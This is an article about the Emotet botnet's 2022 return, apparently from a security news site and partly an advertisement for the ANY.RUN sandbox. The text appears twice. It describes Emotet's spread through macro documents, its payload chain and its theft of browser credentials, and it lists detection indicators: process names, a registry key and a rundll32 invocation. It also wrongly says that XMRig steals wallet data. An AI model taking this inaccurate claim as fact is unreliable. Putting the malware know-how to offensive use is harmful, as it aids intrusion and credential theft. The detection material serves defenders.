This tendency proves that Emotet isn't going anywhere despite frequent "vacations" and even the official shutdown. The malware evolves fast and adapts to everything.

**What features has a new Emotet 2022 version acquired?**

After almost half a year of a break, the Emotet botnet returned even stronger. Here is what you need to know about a new 2022 version:

*   It drops IcedID, a modular banking trojan.
*   The malware loads XMRig, a miner that steals wallet data.
*   The trojan has binary changes.
*   Emotet bypasses detection using a 64-bit code base.
*   A new version uses new commands:

Invoke rundll32.exe with a random named DLL and the export PluginInit

*   Emotet's goal is to get credentials from Google Chrome and other browsers.
*   It's also targeted to make use of the SMB protocol to collect company data
*   Like six months ago, the botnet uses XLS malicious lures, but it adopted a new one this time:

The Emotet's Excel lure

**How to detect Emotet?**

The main Emotet challenge is to detect it in the system quickly and accurately. Besides that, a malware analyst should understand the botnet's behavior to prevent future attacks and avoid possible losses.

With its long story of development, Emotet stepped up in the anti-evasion strategy. Through the evolution of the process execution chain and malware activity inside the infected system changes, the malware has modified detection techniques drastically.

For example, in 2018, it was possible to detect this banker by looking at the name of the process – it was one of these:

> eventswrap, implrandom, turnedavatar, soundser, archivesymbol, wabmetagen, msrasteps, secmsi, crsdcard, narrowpurchase, smxsel, watchvsgd, mfidlisvc, searchatsd, lpiograd, noticesman, appxmware, sansidaho

Later, in the first quarter of 2020, Emotet started to create specific key into the registry - it writes into the key HKEY\_CURRENT\_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER value with the length 8 symbols (letters and characters).

Of course, Suricata rules always identify this malware, but detection systems often continue beyond the first wave because rules need to update.

Another way to detect this banker was its malicious documents - crooks use specific templates and lures, even with grammatical errors in them. One of the most reliable ways to detect Emotet is by the YARA rules.

To overcome malware's anti-evasion techniques and capture the botnet – use a malware sandbox as the most convenient tool for this goal. In ANY.RUN, you can not only detect, monitor, and analyze malicious objects but also get already extracted configurations from the sample.

There are some features that you use just for Emotet analysis:

*   reveal C2 links of a malicious sample with the FakeNet
*   use Suricata and YARA rulesets to successfully identify the botnet
*   Get data about C2 servers, keys, and strings extracted from the sample's memory dump
*   gather fresh malware's IOCs

The tool helps to perform successful investigations quickly and precisely, so malware analysts can save valuable time.

ANY.RUN sandbox has prepared incredible deals for **Black Friday 2022**! Now is the best time to boost your malware analysis and save some money! Check out special offers for their premium plans but for a limited time – from 22-29 November, 2022.

Emotet has not demonstrated full functionality and consistent follow-on payload delivery. Use modern tools like ANY.RUN online malware sandbox to improve your cybersecurity and detect this botnet effectively. Stay safe and good threat hunting!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

All You Need to Know About Emotet in 2022

For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it.
Why is everyone scared of Emotet?
Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication.

For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it.

**Why is everyone scared of Emotet?**

Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication. The victim can be anyone from corporate to private users exposed to spam email campaigns.

The botnet distributes through phishing containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL downloads and then loads into memory.

It searches for email addresses and steals them for spam campaigns. Moreover, the botnet drops additional payloads, such as Cobalt Strike or other attacks that lead to ransomware.

The polymorphic nature of Emotet, along with the many modules it includes, makes the malware challenging to identify. The Emotet team constantly changes its tactics, techniques, and procedures to ensure that the existing detection rules cannot be applied. As part of its strategy to stay invisible in the infected system, the malicious software downloads extra payloads using multiple steps.

And the results of Emotet behavior are devastating for cybersecurity specialists: the malware is nearly impossible to remove. It spreads quickly, generates faulty indicators, and adapts according to attackers' needs.

**How has Emotet upgraded over the years?**

Emotet is an advanced and constantly changing modular botnet. The malware started its journey as a simple banking trojan in 2014. But since then, it has acquired a bunch of different features, modules, and campaigns:

*   2014\. Money transfer, mail spam, DDoS, and address book stealing modules.
*   2015\. Evasion functionality.
*   2016\. Mail spam, RIG 4.0 exploit kit, delivery of other trojans.
*   2017\. A spreader and address book stealer module.
*   2021\. XLS malicious templates, uses MSHTA, dropped by Cobalt Strike.
*   2022\. Some features remained the same, but this year also brought several updates.

This tendency proves that Emotet isn't going anywhere despite frequent "vacations" and even the official shutdown. The malware evolves fast and adapts to everything.

**What features has a new Emotet 2022 version acquired?**

After almost half a year of a break, the Emotet botnet returned even stronger. Here is what you need to know about a new 2022 version:

*   It drops IcedID, a modular banking trojan.
*   The malware loads XMRig, a miner that steals wallet data.
*   The trojan has binary changes.
*   Emotet bypasses detection using a 64-bit code base.
*   A new version uses new commands:

Invoke rundll32.exe with a random named DLL and the export PluginInit

*   Emotet's goal is to get credentials from Google Chrome and other browsers.
*   It's also targeted to make use of the SMB protocol to collect company data
*   Like six months ago, the botnet uses XLS malicious lures, but it adopted a new one this time:

The Emotet's Excel lure

**How to detect Emotet?**

The main Emotet challenge is to detect it in the system quickly and accurately. Besides that, a malware analyst should understand the botnet's behavior to prevent future attacks and avoid possible losses.

With its long story of development, Emotet stepped up in the anti-evasion strategy. Through the evolution of the process execution chain and malware activity inside the infected system changes, the malware has modified detection techniques drastically.

For example, in 2018, it was possible to detect this banker by looking at the name of the process – it was one of these:

> eventswrap, implrandom, turnedavatar, soundser, archivesymbol, wabmetagen, msrasteps, secmsi, crsdcard, narrowpurchase, smxsel, watchvsgd, mfidlisvc, searchatsd, lpiograd, noticesman, appxmware, sansidaho

Later, in the first quarter of 2020, Emotet started to create specific key into the registry - it writes into the key HKEY\_CURRENT\_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER value with the length 8 symbols (letters and characters).

Of course, Suricata rules always identify this malware, but detection systems often continue beyond the first wave because rules need to update.

Another way to detect this banker was its malicious documents - crooks use specific templates and lures, even with grammatical errors in them. One of the most reliable ways to detect Emotet is by the YARA rules.

To overcome malware's anti-evasion techniques and capture the botnet – use a malware sandbox as the most convenient tool for this goal. In ANY.RUN, you can not only detect, monitor, and analyze malicious objects but also get already extracted configurations from the sample.

There are some features that you use just for Emotet analysis:

*   reveal C2 links of a malicious sample with the FakeNet
*   use Suricata and YARA rulesets to successfully identify the botnet
*   Get data about C2 servers, keys, and strings extracted from the sample's memory dump
*   gather fresh malware's IOCs

The tool helps to perform successful investigations quickly and precisely, so malware analysts can save valuable time.

ANY.RUN sandbox has prepared incredible deals for **Black Friday 2022**! Now is the best time to boost your malware analysis and save some money! Check out special offers for their premium plans but for a limited time – from 22-29 November, 2022.

Emotet has not demonstrated full functionality and consistent follow-on payload delivery. Use modern tools like ANY.RUN online malware sandbox to improve your cybersecurity and detect this botnet effectively. Stay safe and good threat hunting!

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac